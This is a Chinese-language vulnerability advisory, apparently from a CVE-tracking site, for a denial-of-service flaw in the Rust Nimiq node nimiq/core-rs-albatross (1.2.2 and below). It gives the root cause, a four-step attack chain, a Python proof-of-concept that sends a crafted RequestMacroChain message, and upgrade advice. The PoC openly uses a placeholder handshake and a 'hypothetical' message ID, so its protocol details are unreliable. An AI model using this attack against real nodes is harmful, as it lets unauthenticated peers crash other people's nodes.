CVE-2026-34069 nimiq/core-rs拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-34069

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

nimiq/core-rs-albatross

漏洞概述

nimiq/core-rs-albatross是基于Albatross共识算法的Nimiq权益证明协议的Rust实现。在1.2.2及以下版本中存在一个拒绝服务漏洞。未经身份验证的P2P对等节点可以发送恶意的RequestMacroChain消息，其中受害者主链上的第一个定位哈希被设置为微区块哈希。这会导致消息处理程序在尝试获取宏区块时触发panic并崩溃。官方已在1.3.0版本中修复了此问题。

技术细节

该漏洞源于`RequestMacroChain`消息处理程序中存在的不安全解包操作。在处理P2P网络消息时，`RequestMacroChain::handle`函数负责根据提供的定位哈希获取宏区块。该函数首先验证哈希是否存在于主链上，但未进一步区分哈希类型（宏区块或微区块）。随后，代码调用`get_macro_blocks()`并直接使用`.unwrap()`期望获取有效结果。然而，若攻击者发送一个包含微区块哈希的恶意请求，`get_macro_blocks()`将返回`BlockchainError::BlockIsNotMacro`错误。由于`.unwrap()`遇到错误时会立即触发panic，导致整个处理任务异常终止。这种逻辑缺陷允许未经身份验证的攻击者远程破坏节点进程的稳定性。

攻击链分析

STEP 1

1. Reconnaissance

Identify a vulnerable Nimiq node running version 1.2.2 or lower, listening on the P2P port.

STEP 2

2. Establish Connection

Initiate a P2P connection to the target node and perform the necessary handshake to become a peer.

STEP 3

3. Send Malicious Payload

Send a 'RequestMacroChain' message where the first locator hash points to a Micro Block hash that is on the victim's main chain.

STEP 4

4. Trigger Panic

The victim's handler calls get_macro_blocks() on the micro block hash, causing a BlockchainError. The .unwrap() call triggers a panic/DoS.

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-34069
# This script demonstrates the logic to trigger the panic.
# Note: Actual network packet structure depends on Nimiq P2P protocol specs.

import socket
import struct

def send_malicious_p2p_message(target_ip, target_port):
    """
    Sends a crafted RequestMacroChain message with a micro block hash
    as the first locator to trigger the panic.
    """
    try:
        # Establish connection to the target node
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))

        # Placeholder for P2P Handshake (simplified)
        # In a real scenario, a valid handshake is required first.
        s.send(b"HANDSHAKE_DATA...")

        # Construct the malicious payload
        # Message Type: RequestMacroChain (Hypothetical ID 0x15)
        msg_type = struct.pack('>H', 0x15)
        
        # Locator hashes: The first hash must be a Micro Block hash present on the main chain.
        # Normally this expects a Macro Block hash.
        # Using a dummy micro block hash for demonstration.
        micro_block_hash = bytes.fromhex("00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff")
        
        # Serialize payload (Length + Hash)
        # This is pseudo-serialization based on the vulnerability description
        payload = msg_type + struct.pack('>B', 1) + micro_block_hash # 1 locator
        
        # Send payload
        s.send(payload)
        print("[+] Malicious message sent. If vulnerable, the node should panic.")
        
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

# Usage
# send_malicious_p2p_message("<TARGET_IP>", <TARGET_PORT>)

影响范围

nimiq/core-rs-albatros <= 1.2.2

防御指南

临时缓解措施

建议立即将nimiq/core-rs-albatross组件升级至1.3.0或更高版本。如果无法立即升级，应限制P2P端口的网络访问，仅允许可信的对等节点连接，以降低被未经认证的攻击者利用的风险。